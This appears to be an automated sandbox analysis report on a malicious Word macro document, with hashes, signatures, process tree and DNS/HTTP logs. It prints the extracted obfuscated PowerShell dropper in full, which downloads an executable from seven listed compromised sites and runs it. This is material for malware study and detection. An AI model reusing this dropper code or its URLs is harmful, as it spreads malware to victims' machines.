Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    27/09/2024, 03:57 UTC

General

  • Target

    f9aa43fd07fd831aa3938317df777884_JaffaCakes118.doc

  • Size

    143KB

  • MD5

    f9aa43fd07fd831aa3938317df777884

  • SHA1

    ca3c9f652bfb945bdf94f2b4de46cce5b3eb3ed3

  • SHA256

    5f1ea173886baa8208a164cab30480d8362327401dc4782d01aa1caeb3314b9d

  • SHA512

    fde6615e11e8ab41da18ee1fabdcd29ae4597c4355455c109ed220c0dae177af0b6ec620161c408b9c9b1328ebf8411b85543f81a2409abe484387ab8d44aed3

  • SSDEEP

    1536:ALRD3bNqfNpu39IId5a6XP3Mg8afCqaIoF3Cgar3Pd0MZXiNjLooT:8R1qf69xak3MgxCCoMFr3Pd0MZXiNPvT

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Aq3qi8j=('N'+('e'+'xhh')+'m5');&('ne'+'w-ite'+'m') $EnV:UseRproFilE\Zqx41rP\OnFoGa8\ -itemtype DirEctory;[Net.ServicePointManager]::"SeCu`RItypR`O`ToCol" = ('tl'+('s'+'12, tls1')+'1,'+' t'+'ls');$J9g_adk = ('E0'+('jn'+'w')+'y3');$Jzg4_0_=('Bn'+('_vl6'+'h'));$M503fem=$env:userprofile+(('EY'+'B'+('Zqx'+'41r'+'p')+('EY'+'BOnfog'+'a8'+'EY')+'B')."R`ePLace"(('E'+'YB'),'\'))+$J9g_adk+('.'+('e'+'xe'));$Eqkv5ic=(('N3'+'j')+('h2t'+'g'));$Br9ijhy=&('new-ob'+'j'+'ect') nEt.WEbclIeNt;$I6kafnl=('ht'+'t'+('p'+'s:'+'//s'+'hop.mtcss.co'+'.')+'u'+('k/'+'w')+('p-ad'+'m'+'in/US'+'QF')+'Pj'+('/*'+'htt')+('ps:/'+'/h')+('andf'+'i')+('nger.'+'c')+'o'+'m'+('/wp-'+'i'+'ncl')+('u'+'des/iC'+'Y/*h'+'t')+('tp:'+'/'+'/hanu')+'l'+('mo'+'tor')+'s'+('.com'+'/'+'nbq'+'s')+('o/8'+'T')+('z'+'/*')+('htt'+'p:'+'//he')+('lpi'+'nghand'+'s4n'+'ee'+'d')+('y.o'+'rg')+('/w'+'p-con'+'t')+('e'+'nt')+('/Lgr'+'I9'+'g/')+('*htt'+'p://'+'w')+('ww.'+'eco'+'barato'+'canari'+'a.com')+'/'+'wo'+'rd'+('p'+'ress/')+('Jt/'+'*')+('h'+'tt')+('p:/'+'/ma'+'cerin')+'d'+'ia'+('.'+'com/w'+'p-con'+'tent')+'/'+'h'+'R'+('S/*'+'ht')+('tp'+'://cf'+'n.')+('tvs'+'tart'+'up.co')+('m/'+'wp')+('-cont'+'ent/7'+'dNH1L'+'I/'))."S`pliT"([char]42);$R2ct1qi=(('Ek'+'g5')+('mj'+'c'));foreach($Mqnj4jr in $I6kafnl){try{$Br9ijhy."DO`wnLo`ADfi`lE"($Mqnj4jr, $M503fem);$Thggohh=('Q'+('9kh'+'13')+'w');If ((.('G'+'et-Item') $M503fem)."leng`Th" -ge 30237) {&('Invok'+'e-'+'Item')($M503fem);$Q8v4yn2=(('Tptc'+'i')+'8j');break;$Yquma0r=('X7'+('4'+'ga6')+'o')}}catch{}}$Qyzmrtd=('L'+('0x'+'3yd'+'p'))
URLs
exe.dropper

https://shop.mtcss.co.uk/wp-admin/USQFPj/

exe.dropper

https://handfinger.com/wp-includes/iCY/

exe.dropper

http://hanulmotors.com/nbqso/8Tz/

exe.dropper

http://helpinghands4needy.org/wp-content/LgrI9g/

exe.dropper

http://www.ecobaratocanaria.com/wordpress/Jt/

exe.dropper

http://macerindia.com/wp-content/hRS/

exe.dropper

http://cfn.tvstartup.com/wp-content/7dNH1LI/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f9aa43fd07fd831aa3938317df777884_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2292
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2344

    Network

    • flag-us
      DNS
      shop.mtcss.co.uk
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      shop.mtcss.co.uk
      IN A
      Response
      shop.mtcss.co.uk
      IN A
      165.84.218.143
    • flag-us
      DNS
      handfinger.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      handfinger.com
      IN A
      Response
      handfinger.com
      IN A
      108.61.87.182
    • flag-us
      DNS
      hanulmotors.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      hanulmotors.com
      IN A
      Response
      hanulmotors.com
      IN A
      107.178.223.183
      hanulmotors.com
      IN A
      104.155.138.21
    • flag-us
      GET
      http://hanulmotors.com/nbqso/8Tz/
      POwersheLL.exe
      Remote address:
      107.178.223.183:80
      Request
      GET /nbqso/8Tz/ HTTP/1.1
      Host: hanulmotors.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Length: 0
    • flag-us
      DNS
      helpinghands4needy.org
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      helpinghands4needy.org
      IN A
      Response
      helpinghands4needy.org
      IN A
      62.72.28.183
    • flag-in
      GET
      http://helpinghands4needy.org/wp-content/LgrI9g/
      POwersheLL.exe
      Remote address:
      62.72.28.183:80
      Request
      GET /wp-content/LgrI9g/ HTTP/1.1
      Host: helpinghands4needy.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Connection: Keep-Alive
      Keep-Alive: timeout=5, max=100
      content-type: text/html
      last-modified: Mon, 11 Sep 2023 19:30:30 GMT
      etag: "999-64ff6ad6-58be6882cd98db7a;;;"
      accept-ranges: bytes
      content-length: 2457
      date: Fri, 27 Sep 2024 03:57:36 GMT
      server: LiteSpeed
      platform: hostinger
      panel: hpanel
    • flag-us
      DNS
      www.ecobaratocanaria.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      www.ecobaratocanaria.com
      IN A
      Response
    • flag-us
      DNS
      macerindia.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      macerindia.com
      IN A
      Response
      macerindia.com
      IN A
      104.21.51.108
      macerindia.com
      IN A
      172.67.179.125
    • flag-us
      GET
      http://macerindia.com/wp-content/hRS/
      POwersheLL.exe
      Remote address:
      104.21.51.108:80
      Request
      GET /wp-content/hRS/ HTTP/1.1
      Host: macerindia.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 27 Sep 2024 03:57:36 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-UA-Compatible: IE=edge
      Link: <http://macerindia.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgsg1cuaBm4WkF%2BKZvBmMIfwV7jvr0I%2BC7%2BxOB0hB%2B8YkkgH9zQZPkgF9ldXvCsGZQ2Y7IBADarnyTF07vD2cwuib36LDSX6RggA%2BWO1kHVYHr9Vjv5PX%2BLpk%2BY0kwY3Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Speculation-Rules: "/cdn-cgi/speculation"
      Server: cloudflare
      CF-RAY: 8c98920e3c997765-LHR
    • flag-us
      DNS
      cfn.tvstartup.com
      POwersheLL.exe
      Remote address:
      8.8.8.8:53
      Request
      cfn.tvstartup.com
      IN A
      Response
      cfn.tvstartup.com
      IN A
      38.86.32.67
    • flag-us
      GET
      http://cfn.tvstartup.com/wp-content/7dNH1LI/
      POwersheLL.exe
      Remote address:
      38.86.32.67:80
      Request
      GET /wp-content/7dNH1LI/ HTTP/1.1
      Host: cfn.tvstartup.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 503 Service Unavailable
      Date: Fri, 27 Sep 2024 03:57:36 GMT
      Server: Apache
      Retry-After: 600
      Connection: close
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=utf-8
    • 165.84.218.143:443
      shop.mtcss.co.uk
      tls
      POwersheLL.exe
      350 B
      219 B
      5
      5
    • 165.84.218.143:443
      shop.mtcss.co.uk
      tls
      POwersheLL.exe
      350 B
      219 B
      5
      5
    • 108.61.87.182:443
      handfinger.com
      tls
      POwersheLL.exe
      348 B
      219 B
      5
      5
    • 108.61.87.182:443
      handfinger.com
      tls
      POwersheLL.exe
      348 B
      219 B
      5
      5
    • 107.178.223.183:80
      http://hanulmotors.com/nbqso/8Tz/
      http
      POwersheLL.exe
      351 B
      250 B
      6
      5

      HTTP Request

      GET http://hanulmotors.com/nbqso/8Tz/

      HTTP Response

      200
    • 62.72.28.183:80
      http://helpinghands4needy.org/wp-content/LgrI9g/
      http
      POwersheLL.exe
      366 B
      3.0kB
      6
      5

      HTTP Request

      GET http://helpinghands4needy.org/wp-content/LgrI9g/

      HTTP Response

      404
    • 104.21.51.108:80
      http://macerindia.com/wp-content/hRS/
      http
      POwersheLL.exe
      1.3kB
      53.3kB
      27
      46

      HTTP Request

      GET http://macerindia.com/wp-content/hRS/

      HTTP Response

      404
    • 38.86.32.67:80
      http://cfn.tvstartup.com/wp-content/7dNH1LI/
      http
      POwersheLL.exe
      362 B
      2.3kB
      6
      7

      HTTP Request

      GET http://cfn.tvstartup.com/wp-content/7dNH1LI/

      HTTP Response

      503
    • 8.8.8.8:53
      shop.mtcss.co.uk
      dns
      POwersheLL.exe
      62 B
      78 B
      1
      1

      DNS Request

      shop.mtcss.co.uk

      DNS Response

      165.84.218.143

    • 8.8.8.8:53
      handfinger.com
      dns
      POwersheLL.exe
      60 B
      76 B
      1
      1

      DNS Request

      handfinger.com

      DNS Response

      108.61.87.182

    • 8.8.8.8:53
      hanulmotors.com
      dns
      POwersheLL.exe
      61 B
      93 B
      1
      1

      DNS Request

      hanulmotors.com

      DNS Response

      107.178.223.183
      104.155.138.21

    • 8.8.8.8:53
      helpinghands4needy.org
      dns
      POwersheLL.exe
      68 B
      84 B
      1
      1

      DNS Request

      helpinghands4needy.org

      DNS Response

      62.72.28.183

    • 8.8.8.8:53
      www.ecobaratocanaria.com
      dns
      POwersheLL.exe
      70 B
      143 B
      1
      1

      DNS Request

      www.ecobaratocanaria.com

    • 8.8.8.8:53
      macerindia.com
      dns
      POwersheLL.exe
      60 B
      92 B
      1
      1

      DNS Request

      macerindia.com

      DNS Response

      104.21.51.108
      172.67.179.125

    • 8.8.8.8:53
      cfn.tvstartup.com
      dns
      POwersheLL.exe
      63 B
      79 B
      1
      1

      DNS Request

      cfn.tvstartup.com

      DNS Response

      38.86.32.67

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      b9b3b2336082afbf88a52b33d8e0715c

      SHA1

      9af482baa7eae6764664794d12eafd04dc68ba1e

      SHA256

      2ebbaa16a14690be371c40f98c3b0e93ce7dad747191e1bb4a5a04d64b764300

      SHA512

      ac6e39a42e3490d692deaccc52f0d228a158f0227a3d3c5af3d46ee710f6268cfe662189994ab5fe102c5e3135d147ddf7a8f647532798f263b0730e61cd243b

